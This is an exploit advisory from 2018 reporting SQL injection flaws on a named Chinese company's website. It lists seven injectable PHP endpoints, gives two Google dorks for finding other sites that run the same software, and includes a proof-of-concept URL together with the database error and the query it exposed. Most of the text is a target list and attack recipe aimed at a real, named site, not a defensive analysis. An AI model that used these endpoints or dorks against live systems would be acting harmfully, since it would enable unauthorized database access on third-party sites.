#################################################################################################
# Exploit Title : China Investor Ningbo Liangzhu Culture Industrial Pack Development Management Co. Ltd. SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 01/06/2018
# Vendor Homepage : nblztd.com
# Tested On : Windows
# Exploit Risk : Medium
# CWE: CWE-89
#################################################################################################
# Google Dork 1 : inurl:''/liangzhutd.php?catid=''
# Google Dork 2 : intext:''Investor:Ningbo Liangzhu Culture Industrial Pack Development Co.,Ltd. InvestmentConsultant:T&C Asset Management Consulting Ltd.,Eastern China Office''
# Exploit : /aboutus.php?catid=[SQL Injection]
# Exploit : /getto.php?catid=[SQL Injection]
# Exploit : /liangzhutd.php?catid=[SQL Injection]
# Exploit : /matingxm.php?catid=[SQL Injection]
# Exploit : /news.php?catid=[SQL Injection]
# Exploit : /news_detail.php?newsid=[SQL Injection]
# Exploit : /intolz.php?catid=[SQL Injection]
#################################################################################################
# Example Site => nblztd.com/aboutus.php?catid=14%27 => [ Proof of Concept for SQL Inj ] => archive.is/qdb3f
# SQL/DB Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''14''' at line 1
select id,name,keywords,description,phthurl,content from lz_pagecontent where id='14''
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################